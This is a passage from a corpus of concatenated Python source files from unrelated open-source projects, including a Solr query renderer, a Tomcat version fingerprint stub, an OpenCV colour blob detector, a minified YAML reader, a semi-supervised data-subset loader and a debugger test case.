expr: an Expression.
Return:
a str representing Solr query corresponding to expr_or_exprs_group.
"""
# Corresponds to converting field-search expression or unary expression:
# `hello`
# `~hello`
# `NOT hello`
# `fieldX:2018-3-15`
# `fieldY:(some OR (more AND complex) ~expression NOT here)`
if not expr.field_name:
return self._render_unary_exprs(
self.GLOBAL_SEARCH, parser.EQUALS, expr.value
)
try:
# Expr should match any of available field types for GAE field name.
schema_fields = self.grouped_schema_fields[expr.field_name]
except KeyError:
logger.warning('Unknown field "{}" in query string'
.format(expr.field_name))
raise self.NotApplicableValue()
return self._render_unary_exprs(schema_fields, expr.operator, expr.value)
def _render_unary_exprs(self, schema_fields, operator, value_or_values_group):
""" Renders an Expression limited to particular SOLR field
(so it has one known type) or GLOBAL_SEARCH.
If value_or_values_group is ValuesGroup, it extracts values in brackets
and prepends solr field with operator to every nested value.
Args:
schema_fields: a list of SolrSchemaFieldInfo or GLOBAL_SEARCH.
operator: EQUALS, LESS, LESS_EQ, GREATER or GREATER_EQ.
value_or_values_group: a Value or ValuesGroup.
Return:
a str representing Solr query corresponding to expression
limited to particular SOLR field (with known type) or GLOBAL_SEARCH.
"""
if isinstance(value_or_values_group, parser.Value):
value = value_or_values_group
return self._render_single_unary_expr(schema_fields, operator, value)
# Process nested tree.
values_group = value_or_values_group
nested_unary_exprs = []
for element in values_group.elements:
try:
rendered = self._render_unary_exprs(schema_fields, operator, element)
nested_unary_exprs.append(rendered)
except self.NotApplicableValue:
# e.g.: searching "word" against filed with date type.
if operator == parser.AND:
# There's no sense to continue.
raise
continue
if not nested_unary_exprs:
      # e.g.: searching ONLY text against a field with date type.
raise self.NotApplicableValue()
if len(nested_unary_exprs) == 1:
return nested_unary_exprs[0]
operator = u' AND ' if values_group.operator == parser.AND else u' OR '
return u'({})'.format(operator.join(nested_unary_exprs))
def _render_single_unary_expr(self, schema_fields, operator, value):
""" Renders a leaf of Solr query string which is limited
to particular SOLR field (or GLOBAL_SEARCH) and a single value.
Args:
schema_fields: a list of SolrSchemaFieldInfo or GLOBAL_SEARCH.
operator: EQUALS, LESS, LESS_EQ, GREATER or GREATER_EQ.
value: a Value.
Return:
a str representing Solr query leaf corresponding to expression
limited to particular SOLR field (or GLOBAL_SEARCH) and a single value.
"""
right_hand = value.str_value
if right_hand[0] != u'"':
right_hand = u'"{}"'.format(right_hand)
if value.stem:
right_hand = right_hand + u'~'
if schema_fields == self.GLOBAL_SEARCH:
# We need to add all text, atom and html fields to query_fields list
self.has_string_values = True
if value.has_number_value:
# We need to add all number fields to query_fields list
self.has_number_values = True
if value.has_date_value:
# We need to add all date fields to query_fields list
self.has_date_values = True
return u'NOT {}'.format(right_hand) if value.not_ else right_hand
# Connect by OR rendered statement for each field type
statements = []
for schema_field in schema_fields:
# Skip if value is not applicable for field type.
if schema_field.type == _SOLR_TYPE.TEXT_FIELD:
if operator != parser.EQUALS:
# Can't compare using > < >= <=
continue
elif schema_field.type == _SOLR_TYPE.ATOM_FIELD:
if operator != parser.EQUALS or value.stem:
# Can't stem atom field or compare using > < >= <=
continue
elif schema_field.type == _SOLR_TYPE.NUMBER_FIELD:
if not value.has_number_value or value.stem:
# Can't search text against number field
continue
elif schema_field.type == _SOLR_TYPE.DATE_FIELD:
if not value.has_date_value or value.stem:
# Can't search text against date field
continue
elif schema_field.type == _SOLR_TYPE.GEO_FIELD:
logger.warning('Geo location queries are not supported yet.')
continue
else: # schema_field.type is not queryable
continue
rendered = self._render_field_operator_value(
schema_field, operator, right_hand
)
statements.append(u'NOT {}'.format(rendered) if value.not_ else rendered)
if not statements:
# e.g.: searching "word" against filed with ONLY date type.
raise self.NotApplicableValue()
if len(statements) == 1:
return statements[0]
# e.g.: searching "1999-10-20" against field with type date and text.
# Any match should be enough.
return u'({})'.format(u' OR '.join(statements))
@staticmethod
def _render_field_operator_value(schema_field, operator, right_hand):
""" Renders equality or range query according to Solr query syntax.
Args:
schema_field: a SolrSchemaFieldInfo or GLOBAL_SEARCH.
operator: EQUALS, LESS, LESS_EQ, GREATER or GREATER_EQ.
right_hand: a str representing value.
Returns:
A string representing equality or range query.
"""
if operator == parser.EQUALS:
return u'{}:{}'.format(schema_field.solr_name, right_hand)
if operator == parser.LESS:
return u'{}:[* TO {}}}'.format(schema_field.solr_name, right_hand)
if operator == parser.LESS_EQ:
return u'{}:[* TO {}]'.format(schema_field.solr_name, right_hand)
if operator == parser.GREATER:
return u'{}:{{{} TO *]'.format(schema_field.solr_name, right_hand)
if operator == parser.GREATER_EQ:
return u'{}:[{} TO *]'.format(schema_field.solr_name, right_hand)
|
src/platform/tomcat/fingerprints/Tomcat33.py
|
0x27/clusterd
| 539 |
118834
|
from src.platform.tomcat.interfaces import AppInterface
class FPrint(AppInterface):
def __init__(self):
super(FPrint, self).__init__()
self.version = "3.3"
self.uri = "/doc/readme"
|
rltime/acting/actor_wrapper.py
|
frederikschubert/rltime
| 147 |
118861
|
from .acting_interface import ActingInterface
class ActorWrapper(ActingInterface):
"""Wrapper for a created actor
Allows overriding only specific actor methods while passing through the
rest, similar to gym wrappers
"""
def __init__(self, actor):
super().__init__(*actor.get_spaces())
self._actor = actor
def get_samples(self, min_samples):
return self._actor.get_samples(min_samples)
def get_env_count(self):
return self._actor.get_env_count()
def set_actor_policy(self, actor_policy):
return self._actor.set_actor_policy(actor_policy)
def update_state(self, progress, policy_state=None):
return self._actor.update_state(progress, policy_state)
def close(self):
return self._actor.close()
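# A hedged sketch of the intended wrapper pattern (the post-processing step is
# hypothetical, not part of rltime): subclass ActorWrapper, override only the
# method of interest and let the base class delegate everything else.
#
#   class PostProcessedActor(ActorWrapper):
#       def get_samples(self, min_samples):
#           samples = self._actor.get_samples(min_samples)
#           return samples  # e.g. filter or transform the samples here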
|
py/vision/blob_detector.py
|
wx-b/dm_robotics
| 128 |
118863
|
# Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module defining a color-based blob detector for camera images."""
from typing import Mapping, Optional, Tuple
from absl import logging
import cv2
from dmr_vision import detector
from dmr_vision import types
import numpy as np
class BlobDetector(detector.ImageDetector):
"""Color-based blob detector."""
def __init__(self,
color_ranges: Mapping[str, types.ColorRange],
scale: float = (1. / 6.),
min_area: int = 230,
mask_points: Optional[types.MaskPoints] = None,
visualize: bool = False,
toolkit: bool = False):
"""Constructs a `BlobDetector` instance.
Args:
color_ranges: A mapping between a given blob name and the range of YUV
color used to segment it from an image.
      scale: Image rescaling factor. Used to increase the frame rate, at the
        cost of reducing the precision of the blob barycenter and contour.
min_area: The minimum area the detected blob must have.
      mask_points: (u, v) coordinates defining closed regions of interest in
        the image where the blob detector will not look for blobs.
visualize: Whether to output a visualization of the detected blob or not.
toolkit: Whether to display a YUV GUI toolkit for parameter tuning.
        Enabling this implicitly sets `visualize = True`.
"""
self._color_ranges = color_ranges
self._scale = np.array(scale)
self._min_area = min_area
self._mask_points = mask_points if mask_points is not None else ()
self._visualize = visualize
self._mask = None
self._toolkit = toolkit
if self._toolkit:
self._visualize = True
self._window_name = "UV toolkit"
self._window_size = (800, 1000)
cv2.namedWindow(
self._window_name,
cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_EXPANDED)
cv2.resizeWindow(self._window_name, self._window_size)
self._trackbar_scale = 1000
num_colors = len(self._color_ranges.keys())
if num_colors > 1:
cv2.createTrackbar("Color selector", self._window_name, 0,
len(self._color_ranges.keys()) - 1,
self._callback_change_color)
cv2.createTrackbar("Subsampling", self._window_name, 5, 10,
lambda x: None)
cv2.setTrackbarMin("Subsampling", self._window_name, 1)
self._u_range_trackbar = CreateRangeTrackbar(self._window_name, "U min",
"U max", self._color_ranges,
"U", self._trackbar_scale)
self._v_range_trackbar = CreateRangeTrackbar(self._window_name, "V min",
"V max", self._color_ranges,
"V", self._trackbar_scale)
self._callback_change_color(0)
def __del__(self):
if self._toolkit:
cv2.destroyAllWindows()
def __call__(self,
image: np.ndarray) -> Tuple[types.Centers, types.Detections]:
"""Finds color blobs in the image.
Args:
image: the input image.
Returns:
A dictionary mapping a blob name with
- the (u, v) coordinate of its barycenter, if found;
- `None`, otherwise;
and a dictionary mapping a blob name with
- its contour superimposed on the input image;
- `None`, if `BlobDetector` is run with `visualize == False`.
"""
# Preprocess the image.
image = self._preprocess(image)
# Convert the image to YUV.
yuv_image = cv2.cvtColor(image.astype(np.float32) / 255., cv2.COLOR_RGB2YUV)
# Find blobs.
blob_centers = {}
blob_visualizations = {}
for name, color_range in self._color_ranges.items():
blob = self._find_blob(yuv_image, color_range)
blob_centers[name] = blob.center * (1. / self._scale) if blob else None
blob_visualizations[name] = (
self._draw_blobs(image, blob) if self._visualize else None)
if self._toolkit:
self._update_gui_toolkit(yuv_image, image)
return blob_centers, blob_visualizations
def _preprocess(self, image: np.ndarray) -> np.ndarray:
"""Preprocesses an image for color-based blob detection."""
# Resize the image to make all other operations faster.
size = np.round(image.shape[:2] * self._scale).astype(np.int32)
resized = cv2.resize(image, (size[1], size[0]))
if self._mask is None:
self._setup_mask(resized)
# Denoise the image.
denoised = cv2.fastNlMeansDenoisingColored(
src=resized, h=7, hColor=7, templateWindowSize=3, searchWindowSize=5)
return cv2.multiply(denoised, self._mask)
def _setup_mask(self, image: np.ndarray) -> None:
"""Initialises an image mask to explude pixels from blob detection."""
self._mask = np.ones(image.shape, image.dtype)
for mask_points in self._mask_points:
cv2.fillPoly(self._mask, np.int32([mask_points * self._scale]), 0)
def _find_blob(self, yuv_image: np.ndarray,
color_range: types.ColorRange) -> Optional[types.Blob]:
"""Find the largest blob matching the YUV color range.
Args:
yuv_image: An image in YUV color space.
color_range: The YUV color range used for segmentation.
Returns:
If found, the (u, v) coordinate of the barycenter and the contour of the
segmented blob. Otherwise returns `None`.
"""
# Threshold the image in YUV color space.
lower = color_range.lower
upper = color_range.upper
mask = cv2.inRange(yuv_image.copy(), lower, upper)
# Find contours.
_, contours, _ = cv2.findContours(
image=mask, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_SIMPLE)
if not contours:
return None
# Find the largest contour.
max_area_contour = max(contours, key=cv2.contourArea)
# If the blob's area is too small, ignore it.
correction_factor = np.square(1. / self._scale)
normalized_area = cv2.contourArea(max_area_contour) * correction_factor
if normalized_area < self._min_area:
return None
# Compute the centroid.
moments = cv2.moments(max_area_contour)
if moments["m00"] == 0:
return None
cx, cy = moments["m10"] / moments["m00"], moments["m01"] / moments["m00"]
return types.Blob(center=np.array([cx, cy]), contour=max_area_contour)
def _draw_blobs(self, image: np.ndarray, blob: types.Blob) -> np.ndarray:
"""Draws the controuer of the detected blobs."""
frame = image.copy()
if blob:
# Draw center.
cv2.drawMarker(
img=frame,
position=(int(blob.center[0]), int(blob.center[1])),
color=(255, 0, 0),
markerType=cv2.MARKER_CROSS,
markerSize=7,
thickness=1,
line_type=cv2.LINE_AA)
# Draw contours.
cv2.drawContours(
image=frame,
contours=[blob.contour],
contourIdx=0,
color=(0, 0, 255),
thickness=1)
return frame
def _callback_change_color(self, color_index: int) -> None:
"""Callback for YUV GUI toolkit trackbar.
    Reads the current trackbar value and selects the associated color.
    The association between index and color is implementation dependent,
    i.e. it follows the insertion order of the dictionary.
Args:
color_index: The current value of the trackbar. Passed automatically.
"""
colors = list(self._color_ranges.keys())
selected_color = colors[color_index]
min_upper = self._color_ranges[selected_color]
lower = min_upper.lower
upper = min_upper.upper
self._u_range_trackbar.set_trackbar_pos(lower[1], upper[1])
self._v_range_trackbar.set_trackbar_pos(lower[2], upper[2])
cv2.setWindowTitle(self._window_name,
self._window_name + " - Color: " + selected_color)
def _update_gui_toolkit(self, image_yuv: np.ndarray,
image_rgb: np.ndarray) -> None:
"""Updates the YUV GUI toolkit.
Creates and shows the UV representation of the current image.
Args:
image_yuv: The current image in YUV color space.
image_rgb: The current image in RGB color space.
"""
subsample = cv2.getTrackbarPos("Subsampling", self._window_name)
img_u = image_yuv[0::subsample, 0::subsample, 1]
img_v = 1.0 - image_yuv[0::subsample, 0::subsample, 2]
pixel_color = image_rgb[0::subsample, 0::subsample, :]
pixel_color = pixel_color.reshape(np.prod(img_u.shape[0:2]), -1)
img_u = img_u.ravel()
img_v = img_v.ravel()
fig_size = 300
fig = np.full(shape=(fig_size, fig_size, 3), fill_value=255, dtype=np.uint8)
cv2.arrowedLine(
img=fig,
pt1=(0, fig_size),
pt2=(fig_size, fig_size),
color=(0, 0, 0),
thickness=2,
tipLength=0.03)
cv2.arrowedLine(
img=fig,
pt1=(0, fig_size),
pt2=(0, 0),
color=(0, 0, 0),
thickness=2,
tipLength=0.03)
cv2.putText(
img=fig,
text="U",
org=(int(0.94 * fig_size), int(0.97 * fig_size)),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.5,
color=(0, 0, 0),
thickness=2)
cv2.putText(
img=fig,
text="V",
org=(int(0.03 * fig_size), int(0.06 * fig_size)),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.5,
color=(0, 0, 0),
thickness=2)
for i in range(img_u.size):
color = tuple(int(p) for p in pixel_color[i, ::-1])
position = (int(img_u[i] * fig_size), int(img_v[i] * fig_size))
cv2.drawMarker(
img=fig,
position=position,
color=color,
markerType=cv2.MARKER_SQUARE,
markerSize=3,
thickness=2)
u_min, u_max = self._u_range_trackbar.get_trackbar_pos()
u_min = int(u_min * fig_size)
u_max = int(u_max * fig_size)
v_min, v_max = self._v_range_trackbar.get_trackbar_pos()
v_min = int((1.0 - v_min) * fig_size)
v_max = int((1.0 - v_max) * fig_size)
cv2.line(
img=fig,
pt1=(u_min, v_max),
pt2=(u_min, v_min),
color=(0, 0, 0),
thickness=2)
cv2.line(
img=fig,
pt1=(u_max, v_max),
pt2=(u_max, v_min),
color=(0, 0, 0),
thickness=2)
cv2.line(
img=fig,
pt1=(u_min, v_min),
pt2=(u_max, v_min),
color=(0, 0, 0),
thickness=2)
cv2.line(
img=fig,
pt1=(u_min, v_max),
pt2=(u_max, v_max),
color=(0, 0, 0),
thickness=2)
cv2.imshow(self._window_name, fig)
cv2.waitKey(1)
class CreateRangeTrackbar:
"""Class to create and control, on an OpenCV GUI, two trackbars representing a range of values."""
def __init__(self,
window_name: str,
trackbar_name_lower: str,
trackbar_name_upper: str,
color_ranges: Mapping[str, types.ColorRange],
color_code: str,
trackbar_scale: int = 1000):
"""Initializes the class.
Args:
window_name: Name of the window that will be used as a parent of the
created trackbar.
trackbar_name_lower: The name of the trackbar implementing the lower bound
of the range.
trackbar_name_upper: The name of the trackbar implementing the upper bound
of the range.
color_ranges: A mapping between a given blob name and the range of YUV
color used to segment it from an image.
color_code: The color code to change in `color_ranges`. Shall be "U" or
"V".
trackbar_scale: The trackbar scale to recover the real value from the
current trackbar position.
"""
self._window_name = window_name
self._trackbar_name_lower = trackbar_name_lower
self._trackbar_name_upper = trackbar_name_upper
self._color_ranges = color_ranges
self._color_code = color_code
self._trackbar_scale = trackbar_scale
self._trackbar_reset = False
# pylint: disable=g-long-lambda
cv2.createTrackbar(
self._trackbar_name_lower, self._window_name, 0,
self._trackbar_scale, lambda x: self._callback_update_threshold(
"lower", "lower", self._color_code, x))
cv2.createTrackbar(
self._trackbar_name_upper, self._window_name, 0,
self._trackbar_scale, lambda x: self._callback_update_threshold(
"upper", "upper", self._color_code, x))
# pylint: enable=g-long-lambda
def set_trackbar_pos(self, lower_value: float, upper_value: float) -> None:
"""Sets the trackbars to specific values."""
if lower_value > upper_value:
logging.error(
"Wrong values for setting range trackbars. Lower value "
"must be less than upper value. Provided lower: %d. "
"Provided upper: %d.", lower_value, upper_value)
return
    # To change the trackbar values while bypassing the consistency check that
    # the callback enforces (the two sliders form a range), we temporarily set
    # self._trackbar_reset to `True` and restore it to `False` afterwards.
self._trackbar_reset = True
cv2.setTrackbarPos(self._trackbar_name_lower, self._window_name,
int(lower_value * self._trackbar_scale))
cv2.setTrackbarPos(self._trackbar_name_upper, self._window_name,
int(upper_value * self._trackbar_scale))
self._trackbar_reset = False
def get_trackbar_pos(self, normalized: bool = True) -> Tuple[float, float]:
"""Gets the trackbars lower and upper values."""
lower = cv2.getTrackbarPos(self._trackbar_name_lower, self._window_name)
upper = cv2.getTrackbarPos(self._trackbar_name_upper, self._window_name)
if normalized:
return lower / self._trackbar_scale, upper / self._trackbar_scale
else:
return lower, upper
def _callback_update_threshold(self, lower_or_upper: str, attribute: str,
color_code: str, value: int) -> None:
"""Callback for YUV GUI toolkit trackbar.
Reads current trackbar value and updates the associated U or V threshold.
This callback assumes that two trackbars, `trackbar_name_lower` and
`trackbar_name_upper`, form a range of values. As a consequence, when one
    of the two trackbars is moved, a consistency check ensures that the range
    is valid (i.e. the lower value is kept below the upper value and vice versa).
Typical usage example:
To pass it to an OpenCV/Qt trackbar, use this function in a lambda
as follows:
cv2.createTrackbar("Trackbar lower", ..., lambda x:
class_variable._callback_update_threshold("lower", "lower", "U", x))
Args:
lower_or_upper: The behaviour of this callback for the range. Shall be
`lower` or `upper`.
attribute: The name of the threshold in `self._color_ranges` for the
current selected color.
color_code: The color code to change. Shall be "U" or "V".
value: The current value of the trackbar.
"""
if not self._trackbar_reset:
if lower_or_upper == "lower":
limiting_value = cv2.getTrackbarPos(self._trackbar_name_upper,
self._window_name)
if value > limiting_value:
cv2.setTrackbarPos(self._trackbar_name_lower, self._window_name,
limiting_value)
return
elif lower_or_upper == "upper":
limiting_value = cv2.getTrackbarPos(self._trackbar_name_lower,
self._window_name)
if value < limiting_value:
cv2.setTrackbarPos(self._trackbar_name_upper, self._window_name,
limiting_value)
return
selected_color_index = cv2.getTrackbarPos("Color selector",
self._window_name)
colors = list(self._color_ranges.keys())
selected_color = colors[selected_color_index]
updated_value = value / self._trackbar_scale
color_threshold = getattr(self._color_ranges[selected_color], attribute)
if color_code == "U":
color_threshold[1] = updated_value
elif color_code == "V":
color_threshold[2] = updated_value
else:
logging.error(
"Wrong trackbar name. No U/V color code correspondence."
"Provided: `%s`.", color_code)
return
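# A hedged usage sketch (not part of the original module): the YUV bounds below
# are made-up values, and `types.ColorRange` is assumed to expose `lower` and
# `upper` arrays, as suggested by its use in `_find_blob` above.
#
#   ranges = {"green": types.ColorRange(lower=np.array([0.0, 0.0, 0.0]),
#                                       upper=np.array([1.0, 0.45, 0.45]))}
#   blob_detector = BlobDetector(ranges, visualize=False)
#   centers, _ = blob_detector(camera_image)  # camera_image: HxWx3 uint8 RGB
#   print(centers)  # {'green': array([u, v]) or None}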
|
dynaconf/vendor/ruamel/yaml/reader.py
|
sephiartlist/dynaconf
| 2,293 |
118884
|
from __future__ import absolute_import
_F='\ufeff'
_E='\x00'
_D=False
_C='ascii'
_B='\n'
_A=None
import codecs
from .error import YAMLError,FileMark,StringMark,YAMLStreamError
from .compat import text_type,binary_type,PY3,UNICODE_SIZE
from .util import RegExp
if _D:from typing import Any,Dict,Optional,List,Union,Text,Tuple,Optional
__all__=['Reader','ReaderError']
class ReaderError(YAMLError):
def __init__(A,name,position,character,encoding,reason):A.name=name;A.character=character;A.position=position;A.encoding=encoding;A.reason=reason
def __str__(A):
if isinstance(A.character,binary_type):return'\'%s\' codec can\'t decode byte #x%02x: %s\n in "%s", position %d'%(A.encoding,ord(A.character),A.reason,A.name,A.position)
else:return'unacceptable character #x%04x: %s\n in "%s", position %d'%(A.character,A.reason,A.name,A.position)
class Reader:
def __init__(A,stream,loader=_A):
A.loader=loader
if A.loader is not _A and getattr(A.loader,'_reader',_A)is _A:A.loader._reader=A
A.reset_reader();A.stream=stream
def reset_reader(A):A.name=_A;A.stream_pointer=0;A.eof=True;A.buffer='';A.pointer=0;A.raw_buffer=_A;A.raw_decode=_A;A.encoding=_A;A.index=0;A.line=0;A.column=0
@property
def stream(self):
try:return self._stream
except AttributeError:raise YAMLStreamError('input stream needs to specified')
@stream.setter
def stream(self,val):
B=val;A=self
if B is _A:return
A._stream=_A
if isinstance(B,text_type):A.name='<unicode string>';A.check_printable(B);A.buffer=B+_E
elif isinstance(B,binary_type):A.name='<byte string>';A.raw_buffer=B;A.determine_encoding()
else:
if not hasattr(B,'read'):raise YAMLStreamError('stream argument needs to have a read() method')
A._stream=B;A.name=getattr(A.stream,'name','<file>');A.eof=_D;A.raw_buffer=_A;A.determine_encoding()
def peek(A,index=0):
B=index
try:return A.buffer[A.pointer+B]
except IndexError:A.update(B+1);return A.buffer[A.pointer+B]
def prefix(A,length=1):
B=length
if A.pointer+B>=len(A.buffer):A.update(B)
return A.buffer[A.pointer:A.pointer+B]
def forward_1_1(A,length=1):
B=length
if A.pointer+B+1>=len(A.buffer):A.update(B+1)
while B!=0:
C=A.buffer[A.pointer];A.pointer+=1;A.index+=1
if C in'\n\x85\u2028\u2029'or C=='\r'and A.buffer[A.pointer]!=_B:A.line+=1;A.column=0
elif C!=_F:A.column+=1
B-=1
def forward(A,length=1):
B=length
if A.pointer+B+1>=len(A.buffer):A.update(B+1)
while B!=0:
C=A.buffer[A.pointer];A.pointer+=1;A.index+=1
if C==_B or C=='\r'and A.buffer[A.pointer]!=_B:A.line+=1;A.column=0
elif C!=_F:A.column+=1
B-=1
def get_mark(A):
if A.stream is _A:return StringMark(A.name,A.index,A.line,A.column,A.buffer,A.pointer)
else:return FileMark(A.name,A.index,A.line,A.column)
def determine_encoding(A):
while not A.eof and(A.raw_buffer is _A or len(A.raw_buffer)<2):A.update_raw()
if isinstance(A.raw_buffer,binary_type):
if A.raw_buffer.startswith(codecs.BOM_UTF16_LE):A.raw_decode=codecs.utf_16_le_decode;A.encoding='utf-16-le'
elif A.raw_buffer.startswith(codecs.BOM_UTF16_BE):A.raw_decode=codecs.utf_16_be_decode;A.encoding='utf-16-be'
else:A.raw_decode=codecs.utf_8_decode;A.encoding='utf-8'
A.update(1)
if UNICODE_SIZE==2:NON_PRINTABLE=RegExp('[^\t\n\r -~\x85\xa0-\ud7ff\ue000-�]')
else:NON_PRINTABLE=RegExp('[^\t\n\r -~\x85\xa0-\ud7ff\ue000-�𐀀-\U0010ffff]')
_printable_ascii=('\t\n\r'+''.join(map(chr,range(32,127)))).encode(_C)
@classmethod
def _get_non_printable_ascii(D,data):
A=data.encode(_C);B=A.translate(_A,D._printable_ascii)
if not B:return _A
C=B[:1];return A.index(C),C.decode(_C)
@classmethod
def _get_non_printable_regex(B,data):
A=B.NON_PRINTABLE.search(data)
if not bool(A):return _A
return A.start(),A.group()
@classmethod
def _get_non_printable(A,data):
try:return A._get_non_printable_ascii(data)
except UnicodeEncodeError:return A._get_non_printable_regex(data)
def check_printable(A,data):
B=A._get_non_printable(data)
if B is not _A:C,D=B;E=A.index+(len(A.buffer)-A.pointer)+C;raise ReaderError(A.name,E,ord(D),'unicode','special characters are not allowed')
def update(A,length):
if A.raw_buffer is _A:return
A.buffer=A.buffer[A.pointer:];A.pointer=0
while len(A.buffer)<length:
if not A.eof:A.update_raw()
if A.raw_decode is not _A:
try:C,E=A.raw_decode(A.raw_buffer,'strict',A.eof)
except UnicodeDecodeError as B:
if PY3:F=A.raw_buffer[B.start]
else:F=B.object[B.start]
if A.stream is not _A:D=A.stream_pointer-len(A.raw_buffer)+B.start
elif A.stream is not _A:D=A.stream_pointer-len(A.raw_buffer)+B.start
else:D=B.start
raise ReaderError(A.name,D,F,B.encoding,B.reason)
else:C=A.raw_buffer;E=len(C)
A.check_printable(C);A.buffer+=C;A.raw_buffer=A.raw_buffer[E:]
if A.eof:A.buffer+=_E;A.raw_buffer=_A;break
def update_raw(A,size=_A):
C=size
if C is _A:C=4096 if PY3 else 1024
B=A.stream.read(C)
if A.raw_buffer is _A:A.raw_buffer=B
else:A.raw_buffer+=B
A.stream_pointer+=len(B)
if not B:A.eof=True
|
myia/operations/prim_record_setitem.py
|
strint/myia
| 222 |
118915
|
<filename>myia/operations/prim_record_setitem.py
"""Definitions for the primitive `record_setitem`."""
from .. import lib, xtype
from ..lib import MyiaAttributeError, MyiaTypeError, standard_prim, typecheck
from . import primitives as P
@standard_prim(P.record_setitem)
async def infer_record_setitem(
self, engine, data: lib.AbstractClassBase, attr: xtype.String, value
):
"""Infer the return type of primitive `record_setitem`."""
attr_v = self.require_constant(attr, argnum=2)
if attr_v not in data.attributes:
raise MyiaAttributeError(f"Unknown field in {data}: {attr_v}")
model = data.user_defined_version()
expected = model.attributes[attr_v]
if not typecheck(expected, value):
raise MyiaTypeError(f"Expected field {attr_v} to have type {expected}")
return type(data)(
data.tag,
{**data.attributes, attr_v: value},
constructor=data.constructor,
)
__operation_defaults__ = {
"name": "record_setitem",
"registered_name": "record_setitem",
"mapping": P.record_setitem,
"python_implementation": None,
}
__primitive_defaults__ = {
"name": "record_setitem",
"registered_name": "record_setitem",
"type": "inference",
"python_implementation": None,
"inferrer_constructor": infer_record_setitem,
"grad_transform": None,
}
|
SimPEG/utils/curv_utils.py
|
prisae/simpeg
| 358 |
118929
|
<reponame>prisae/simpeg<gh_stars>100-1000
from discretize.utils import volTetra, indexCube, faceInfo
|
cords/utils/data/dataloader/SSL/adaptive/retrievedataloader.py
|
krishnatejakk/AUTOMATA
| 185 |
118941
|
<reponame>krishnatejakk/AUTOMATA
from .adaptivedataloader import AdaptiveDSSDataLoader
from cords.selectionstrategies.SSL import RETRIEVEStrategy
import time, copy
# RETRIEVE
class RETRIEVEDataLoader(AdaptiveDSSDataLoader):
def __init__(self, train_loader, val_loader, dss_args, logger, *args, **kwargs):
"""
Arguments assertion check
"""
assert "model" in dss_args.keys(), "'model' is a compulsory argument. Include it as a key in dss_args"
assert "tea_model" in dss_args.keys(), "'tea_model' is a compulsory argument. Include it as a key in dss_args"
assert "ssl_alg" in dss_args.keys(), "'ssl_alg' is a compulsory argument. Include it as a key in dss_args"
assert "loss" in dss_args.keys(), "'loss' is a compulsory argument. Include it as a key in dss_args"
if dss_args.loss.reduce:
raise ValueError("Please set 'reduce' of loss function to False for adaptive subset selection strategies")
assert "eta" in dss_args.keys(), "'eta' is a compulsory argument. Include it as a key in dss_args"
assert "num_classes" in dss_args.keys(), "'num_classes' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
assert "linear_layer" in dss_args.keys(), "'linear_layer' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
assert "selection_type" in dss_args.keys(), "'selection_type' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
assert "greedy" in dss_args.keys(), "'greedy' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
if dss_args.greedy == 'RGreedy':
assert "r" in dss_args.keys(), "'r' is a compulsory argument for RGreedy version of RETRIEVE. Include it as a key in dss_args"
else:
dss_args.r = 15
assert "valid" in dss_args.keys(), "'valid' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
super(RETRIEVEDataLoader, self).__init__(train_loader, val_loader, dss_args,
logger, *args, **kwargs)
self.strategy = RETRIEVEStrategy(train_loader, val_loader, copy.deepcopy(dss_args.model), copy.deepcopy(dss_args.tea_model),
dss_args.ssl_alg, dss_args.loss, dss_args.eta, dss_args.device, dss_args.num_classes,
dss_args.linear_layer, dss_args.selection_type, dss_args.greedy, logger=logger,
r = dss_args.r, valid = dss_args.valid)
self.train_model = dss_args.model
self.teacher_model = dss_args.tea_model
self.logger.debug('RETRIEVE dataloader initialized.')
def _resample_subset_indices(self):
start = time.time()
self.logger.debug('Iteration: {0:d}, requires subset selection. '.format(self.cur_iter))
cached_state_dict = copy.deepcopy(self.train_model.state_dict())
clone_dict = copy.deepcopy(self.train_model.state_dict())
if self.teacher_model is not None:
tea_cached_state_dict = copy.deepcopy(self.teacher_model.state_dict())
tea_clone_dict = copy.deepcopy(self.teacher_model.state_dict())
else:
tea_clone_dict = None
subset_indices, subset_weights = self.strategy.select(self.budget, clone_dict, tea_clone_dict)
self.train_model.load_state_dict(cached_state_dict)
if self.teacher_model is not None:
self.teacher_model.load_state_dict(tea_cached_state_dict)
end = time.time()
self.logger.info('Iteration: {0:d}, subset selection finished, takes {1:.2f}. '.format(self.cur_iter, (end - start)))
return subset_indices, subset_weights
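# A hedged configuration sketch: the assertions above require dss_args to carry
# at least the keys shown below; the concrete values and the DotMap container
# are hypothetical illustrations only.
#
#   dss_args = DotMap(model=student_model, tea_model=teacher_model,
#                     ssl_alg=ssl_algorithm, loss=per_sample_loss,  # reduce=False
#                     eta=0.1, device='cuda', num_classes=10,
#                     linear_layer=False, selection_type='Supervised',
#                     greedy='Stochastic', valid=True)
#   dataloader = RETRIEVEDataLoader(train_loader, val_loader, dss_args,
#                                   logger, batch_size=64, shuffle=True)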
|
src/debugpy/_vendored/pydevd/tests_python/resources/_debugger_case4.py
|
r3m0t/debugpy
| 695 |
118957
|
<filename>src/debugpy/_vendored/pydevd/tests_python/resources/_debugger_case4.py
import time
class ProceedContainer:
proceed = False
def exit_while_loop():
ProceedContainer.proceed = True
return 'ok'
def sleep():
while not ProceedContainer.proceed: # The debugger should change the proceed to True to exit the loop.
time.sleep(.1)
if __name__ == '__main__':
sleep()
print('TEST SUCEEDED')
|
gffutils/test/expected.py
|
aswarren/gffutils
| 171 |
118992
|
<gh_stars>100-1000
# expected data for tests using FBgn0031208.gff and FBgn0031208.gtf files
# list the children and their expected first-order parents for the GFF test file.
GFF_parent_check_level_1 = {'FBtr0300690':['FBgn0031208'],
'FBtr0300689':['FBgn0031208'],
'CG11023:1':['FBtr0300689','FBtr0300690'],
